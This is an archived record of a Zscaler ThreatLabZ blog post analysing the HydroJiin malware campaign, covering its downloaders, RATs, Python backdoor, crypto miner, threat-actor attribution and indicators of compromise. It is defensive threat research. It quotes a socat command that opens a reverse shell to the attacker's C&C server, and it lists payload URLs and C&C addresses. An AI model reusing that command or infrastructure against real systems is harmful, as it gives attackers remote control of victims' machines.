{
	"id": "1242a645-05a5-4a9f-9a4a-1c122c95768e",
	"created_at": "2026-04-06T00:14:51.2615Z",
	"updated_at": "2026-04-10T03:21:52.510453Z",
	"deleted_at": null,
	"sha1_hash": "a4e2caa2816eb4b829d65f344773f9aa7a75664b",
	"title": "HydroJiin Malware Campaign | ThreatLabZ | Zscaler Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1744363,
	"plain_text": "HydroJiin Malware Campaign | ThreatLabZ | Zscaler Blog\r\nBy Atinderpal Singh, Rohit Chaturvedi, Tarun Dewan\r\nPublished: 2021-04-14 · Archived: 2026-04-05 18:04:38 UTC\r\nZscaler ThreatLabZ recently came across an interesting campaign involving multiple infostealer RAT families and miner\r\nmalware. We’ve dubbed the campaign “HydroJiin” based on aliases used by the threat actor. The threat actor is in the\r\nbusiness of selling malware, and lurks around in online forums that are common hangouts for neophyte to mid-level cyber\r\ncriminals. We speculate that the malware author is running widespread campaigns involving different commodity and\r\ncustom malware to steal information to sell in underground marketplaces.\r\nSimilar to other attacks outlined in the recent ThreatLabZ State of Encrypted Attacks report, this campaign serves as yet\r\nanother example of the importance of continuous SSL inspection and zero trust policies to prevent initial compromise as\r\nwell as communication back to C\u0026C servers. While we do not know the impact of this particular campaign, this type of\r\nmalware is for sale on underground markets to any number of prospective cybercriminals. While not highly sophisticated,\r\nthis campaign uses a number of different techniques in order to increase chances of successfully infiltrating organizations\r\nwho do not take proper precautions. \r\nThis campaign utilizes a variety of payloads and infection vectors from commodity RATs to custom malware, email spam,\r\nbackdooring/masquerading as cracked software, and other lures. Listed below are some of the unique aspects of this\r\ncampaign:\r\nMultilevel infection chain of payloads leading from one to the next\r\nCustom python-based backdoor deployed along with other RATs (Netwired and Quasar)\r\nPython backdoor command checking for MacOS indicating possibility of more cross-platform functionality in the\r\nfuture. \r\nCampaign is related to a threat actor who is also involved in distribution of multiple malicious tools via a dedicated\r\nmalware e-commerce website\r\nPossibility of backdoored malware payload similar to CobianRAT case\r\nNot rare, but heavy use of pastebin to host encoded payloads\r\nInfection chain\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 1 of 10\n\nFigure 1: Infection Chain\r\nThe infection starts with the delivery of a downloader that downloads multiple payloads. We could not confirm the delivery\r\nvector of this downloader but in we suspect the use of spam emails and cracked software as we have seen in earlier\r\ncampaigns. Once the attackers achieve initial compromise, the downloader downloads three files:\r\nInjector - Used as a loader to inject downloaded payloads into legitimate processes.\r\nNetwired RAT - A commodity RAT malware used to control the infected system and steal information.\r\nDownloaderShellcode - Obfuscated Meterpreter-based shellcode to download further payloads.\r\n A Pyrome python backdoor is downloaded by this shellcode. This will also download socat and xmrig miner,\r\nand finally xmrig miner downloads another RAT named Quasar.\r\nEach payload and its functionality is explained below.\r\n1 Analysis of downloader payload\r\nFirst, the downloader downloads a payload from pastebin and saves to %TEMP% path, with randomly generated names.\r\nThe payload hosted on pastebin is encoded in base64 with the text string reversed.\r\nFigure 2: Downloading encoded payload from pastebin\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 2 of 10\n\nThe downloaded malware is an injector. It downloads two more payloads and passes an argument to the first payload for\r\ninjection.\r\nFigure 3: Passing payloads to injector\r\nPayloads are then downloaded from:\r\nxmr-services[.]com/C/ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt -\r\nShellcode Downloader\r\npastebin[.]com/raw/G0jcGs79 - NetwiredRC\r\nThe payloads are also similarly string reversed after base64 encoding.\r\n1.1 NetWiredRC\r\nThe second payload in this case, hosted on pastebin, is a commodity malware known as NetWiredRC. NetWiredRC is a\r\npublicly available RAT sold by World Wired Labs, active since at least 2012. Adversaries often use spam mails and phishing\r\nemails to distribute NetWiredRC. In the wild, it has been seen that NetWireRC is also used by APT threat actors. Netwired’s\r\nmain focus is to gain unauthorized control on the victim machine, steal stored credentials, and perform keylogging activity.\r\nThis malware has had multiple version updates with bug fixes and new functionality. This sample will communicate with\r\nbeltalus.ns1[.]name:8084 for further commands.\r\nConfiguration extracted from Netwire RAT::\r\n{'Domains': ['beltalus.ns1[.]name:8084'], 'Proxy Server': 'Not Configured', 'Password': b'Volve', 'Host ID': b'Loader-\r\n%Rand%', 'Mutex': b'mKsWHTbK', 'Install Path': b'-', 'Startup Name': b'-', 'ActiveX Key': b'-', 'KeyLog Dir':\r\nb'%AppData%\\\\Logs_temp\\\\', 'Proxy Option': 'Direct connection', 'Copy executable': False, 'Delete original': False, 'Lock\r\nexecutable': False, 'Registry autorun': False, 'ActiveX autorun': False, 'Use a mutex': True, 'Offline keylogger': True}\r\n1.2 Shellcode Downloader\r\nThe first of the two downloaded payloads is a Metasploit Shikata Ga Nai Encoder encoded shellcode capable of\r\ndownloading another payload from: r3clama[.]com/files/chrome.exe. \r\nPDB path embedded inside binary: C:\\local0\\asf\\release\\build-2.2.14\\support\\Release\\ab.pdb\r\nThe shellcode downloader downloads the following payloads:\r\nr3clama[.]com/files/socat.zip : Socat tool\r\nr3clama[.]com/files/services.exe : Miner Dropper\r\n1.2.1 PyInstaller Payload\r\nThe payload downloaded from r3clama[.]com is a Python-based malware bundled using pyinstaller. Capabilities of this\r\npayload include:\r\nPersistence using Run key.\r\nDownload, save and extract socat.zip from https://r3clama[.]com/files/socat.zip.\r\nDownload monero miner exe from https://r3clama[.]com/files/services.exe which runs and further downloads\r\nQuasarRAT.\r\nStart network communication thread.\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 3 of 10\n\nFigure 4 : Configuration settings of malware\r\nNetwork Communication\r\nThe malware next communicates with C\u0026C server at IP '193.218.118[.]190' and port 8266, first by sending a key to the\r\nserver and then waiting for .json commands. Commands supported by this malware include:\r\nw0rm\r\nurl\r\nupload\r\nFigure 5 : Commands support by python backdoor\r\nCommand 'url' and 'upload'\r\nBoth url and upload commands are supported only for Windows OS—on any other platform these commands are ignored.\r\nEach of these commands is basically the same, and will download and save a payload from specified url. Files are saved\r\nunder a newly created directory under %temp% with 16-character random names. There are only two differences:\r\n1. In the case of upload, the downloaded file is saved at %temp%/upload and in case of url the file is saved at\r\n%temp%/userbin.\r\n2. The url  command also executes the file in addition to downloading it while the upload command does not.\r\nCommand 'w0rm'\r\nThe w0rm command is supported on two platforms - Windows and MacOS. On receipt of this command, socat runs with\r\nfollowing command line:\r\n\"socat OPENSSL:193[.]218[.]118[.]190:4442,verify=0 EXEC:{OS Command}\"\r\nOS Command\r\nWindows : 'cmd.exe',pipes\r\nMacOS : /bin/bash\r\nAnd sends hostname+’$\u003e’ back to C\u0026C over socket.\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 4 of 10\n\nIn short, this command provides a reverse shell on the system to the attacker through socat. \r\n1.2.1.1 Socat\r\nSocat is an advanced multipurpose data relay tool. It supports a plethora of protocols. Below is the description from its\r\ncreators:\r\n“socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a\r\nfile, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy\r\nCONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of\r\nthese.  These modes include generation of \"listening\" sockets, named pipes, and pseudo terminals.”  -  README\r\n1.2.1.2 Miner Dropper\r\nThis is again a .Net based malware. It includes a monero miner binary and all the dll dependencies required by a monero\r\nminer executable. It will drop and run the miner payload. Then, it downloads and runs an additional payload, again from\r\npastebin.\r\nHere is the Miner Dropper sequence:\r\nInstalls miner executable and dependency files.\r\nFigure 6: Installing xmrig miner dependency files\r\nWaits for idle before starting miner.\r\nFigure 7: Checks if system is Idle before starting miner\r\nCheckActive checks if the miner process is already running, if not then it is started by StartFiles.\r\nFigure 8: Running miner executable with required arguments.\r\nDownloads Quasar RAT payload from (https://pastebin[.]com/raw/khzLqKyN) after starting miner:\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 5 of 10\n\nFigure 9: Downloading another payload(QuasarRAT)\r\nThis miner could be the MinerGate Silent Miner sold on the threat actor’s malware shop. If our assumption is true, there is\r\nanother possibility of that miner being backdoored, similar to an old case of Cobian RAT, piggybacking on client malware\r\noperators to distribute his own RATs. Unfortunately, it is not possible to assert the assumption without access to the builder.\r\n1.2.1.2.1 QuasarRAT\r\nQuasarRAT has been active since at least 2015. Quasar is an open-source project written in .Net framework and freely\r\navailable to the public. This means anyone can take the code and use it freely, with or without modification. Hence, this\r\nmalware has become quite popular among cyber criminals. It has been used in various campaigns from mass spam\r\ncampaigns to targeted attacks. The sample used in this campaign was version 1.3, which has been used in a number of past\r\ncampaigns.\r\nConfiguration of QuasarRAT\r\nVersion: \"1.3.0.0\"\r\nC\u0026C : \"beltalus.ns1[.]name:8082;\"\r\nFilename: \"Client.exe\"\r\nMutex: \"QSR_MUTEX_NJPXiF1GKqO6Y3uwjn\"\r\nThe C\u0026C address used to control the Python backdoor and socat reverse shell is historically known to host C\u0026C servers for\r\nmany other malwares. Here is list of some malware and corresponding ports used to host C\u0026C servers in the past:\r\nIP Port Malware\r\n193.218.118.190 8266 Python backdoor\r\n193.218.118.190 4442 Socat listener OPENSSL\r\n193.218.118.190 1111 NjRAT\r\n193.218.118.190 2407 QuasarRAT\r\n193.218.118.190 8050 Nanocore\r\nThreat Actor HydroJiin\r\nWe believe this campaign is run by a threat actor known by the aliases ‘Hydro’ and ‘JiiN’. The threat actor is active on\r\nforums such as hackforums[.]net since 2010 and on YouTube at least since 2007. Initially the actor was involved with game\r\nmods and cracks, and eventually moved into malware space. We, with high confidence, believe that this actor is from a\r\nFrench-speaking region. \r\nBy the other alias JiiN, the threat actor runs a malware shop called JiiN shop at “xmr-services[.]com”. Based on the two\r\naliases, we are calling this campaign and actor HydroJiin. \r\nWe are attributing this campaign to HydroJiin with high confidence due to following reasons:\r\nJiiN shop(Xmr-services) is used in this campaign.\r\nJiiN shop(Xmr-services) sells malware tools which Hydro makes videos about.\r\nThis campaign downloads an encrypted payload from paste by user Hydro59.\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 6 of 10\n\nAll of the above indicates the relation between HydroJiin, this campaign, and xmr-services.\r\nMalware Shop\r\nThe website called “JiiN shop” is based on the username of malware developer/seller and hosted at “xmr-services[.]com.” It\r\nis used to advertise and sell different malware products. The threat actor is using https://shoppy[.]gg for handling\r\ncryptocurrency payments. He is also selling some additional stuff on shoppy. \r\nFigure 10: JiiN Shop\r\nMalware sold on this website includes:\r\nMinergate silent miner - A configurable miner tool to mine multiple cryptocurrencies on CPU or GPU hidden from\r\nthe user. Comes with a builder with options for obfuscation, persistence, etc.\r\nCoak Crypter - As the name implies, a packer tool to obfuscate other malware to make them undetectable.\r\nNiiJ Stealer - A very basic stealer to steal passwords from popular tools like Firefox, Opera, Chrome, FileZilla, etc\r\nand send to the C\u0026C panel.\r\nINK Exploit - Claims to make malware FUD, but provides no details about the specific exploit.\r\nThe Campaign \r\nThe infection cycle and malware payloads discussed above are just a part of an ongoing campaign. The campaign has been\r\ngoing on since at least September 29th, 2020. The source website for this campaign is also serving other payloads which\r\nled us to more domains and payloads. Covering the whole campaign is out of scope for this blog post. But we are providing\r\nsome details we have noticed. And a non-exhaustive list of malicious websites serving malwares, C\u0026C domains is also\r\nincluded in the IoC section. \r\nMost of the domains as well as served file names follow a pattern. Domains are mostly registered using namecheap. \r\nDomain Pattern:\r\n[a-z]{4,8}\\d{2,4}[a-z]{0,2}.xyz\r\nE.g\r\npzazmrserv194[.]xyz\r\nmpzskdfadvert329[.]xyz\r\nhklkxadvert475[.]xyz\r\nZgkstarserver17km[.]xyz\r\n \r\nFilename pattern example Malware Family\r\natx111.exe SmokeLoader\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 7 of 10\n\nsocks111.exe SystemBC\r\ntau111.exe Tauras Stealer\r\nlkx111 Roger Ransomware\r\nlb777 Lockbit ransomware\r\nvoid.exe Downloader\r\ndesk Anydesk\r\nConclusion\r\nThe threat actor HydroJiin has been in the malware business for some time now. He is selling multiple malware types along\r\nwith running his own campaigns. The malware payload download stats from pastebin indicate he is having decent success.\r\nThis actor might not be highly advanced but he is persistent in his efforts by using various tools, techniques, and methods to\r\nincrease his chances of success. SSL inspection is advisable to detect and block such threats using SSL to hide their\r\nmalicious intent. We at ZScaler ThreatLabZ continue to monitor, and strive to protect our customers from, all levels of\r\nthreats. \r\nDetection\r\nFigure 11: Zscaler Cloud sandbox report flagging malware \r\nIn addition to sandbox detections, the Zscaler Cloud Security Platform detects indicators at various levels:\r\nWin32.Backdoor.NetWiredRC\r\nWin32.Downloader.NetWiredRC\r\nWin32.Backdoor.QuasarRAT\r\nWin32.Coinminer.Xmrig\r\nWin32.Downloader.MiniInject\r\nWin32.Downloader.Pyrome\r\nMITRE ATT\u0026CK\r\nID Tactic Technique\r\nT1059\r\nCommand and Scripting Interpreter:\r\nWindows Command Shell\r\nExecute reverse shell commands\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 8 of 10\n\nT1555 Credentials from Password Stores Mentioned RAT functionality \r\nT1573\r\nEncrypted Channel: Symmetric\r\nCryptography\r\nEncrypt the communication between the victim and the remote\r\nmachine\r\nT1105 Ingress Tool Transfer  Downloads the Miner and RAT on the victim machine\r\nT1056 Input Capture: Keylogging Mentioned RAT functionality \r\nT1112 Modify Registry Modify Run entry in registry\r\nT1090 Proxy Quasar uses SOCKS5 to communicate over a reverse proxy\r\nT1021\r\nRemote Services: Remote Desktop\r\nProtocol\r\nQuasar module to perform remote desktop access\r\nT1053 Scheduled Task/Job: Scheduled Task Establish persistence by creating new schtasks\r\nT1082 System Information Discovery\r\nQuasar and NETWIRE both RAT having this feature to discover\r\nand collect victim machine information.\r\nT1125 Video Capture Mentioned RAT functionality \r\nT1113 Screen Capture Mentioned RAT functionality \r\nT1132 Data Encoding Downloaded Base64 encoded file\r\nT1496 Resource Hijacking Install XMRig Miner on victim machine \r\nT1027 Obfuscated Files or Information XOR operation is implemented to decrypt the file\r\nIOCs\r\nFilename Md5 Malw\r\nVoid.exe [ parent file] 656951fa7b57355b58075b3c06232b01 Win3\r\nABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt 9c50501b6f68921cafed8af6f6688fed Win3\r\nchrome.exe 294fd63ebaae4d2e8c741003776488c2 Win3\r\nService.exe e9bccc96597cc96d22b85010d7fa3004 Win3\r\nkhzLqKyN 3bb3340bccdab8cde94dd1bf105e1d3e Win3\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 9 of 10\n\nG0jcGs79 F094D8C0D9E6766BCCF78DA49AAB3CBC Win3\r\nURLs Malware\r\ngzlkmcserv437[.]xyz/void.exe Win32.Downloader.MiniInject\r\nr3clama[.]com/files/socat.zip Socat tool\r\nr3clama[.]com/files/services.exe Win32.Coinminer.Xmrig\r\npastebin[.]com/raw/khzlqkyn Win32.Backdoor.QuasarRAT\r\npastebin[.]com/raw/G0jcGs79 Win32.Backdoor.NetWiredRC\r\nC\u0026C:\r\nC\u0026C Malware\r\nbeltalus.ns1[.]name:8084' NetWiredRC\r\n82.65.58[.]129 NetWiredRC\r\nxmr.pool.minergate[.]com XMRIG Miner\r\nbeltalus.ns1[.]name:8082 QuasarRAT\r\n193.218.118[.]190:8266 Pyrome backdoor\r\n193.218.118[.]190:4442 Socat \r\n193.218.118[.]190:8266 Python backdoor\r\n193.218.118[.]190:4442 Socat listener OPENSSL\r\n193.218.118[.]190:1111 NjRAT\r\n193.218.118[.]190:2407 QuasarRAT\r\n193.218.118[.]190:8050 Nanocore\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign"
	],
	"report_names": [
		"look-hydrojiin-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434491,
	"ts_updated_at": 1775791312,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a4e2caa2816eb4b829d65f344773f9aa7a75664b.pdf",
		"text": "https://archive.orkl.eu/a4e2caa2816eb4b829d65f344773f9aa7a75664b.txt",
		"img": "https://archive.orkl.eu/a4e2caa2816eb4b829d65f344773f9aa7a75664b.jpg"
	}
}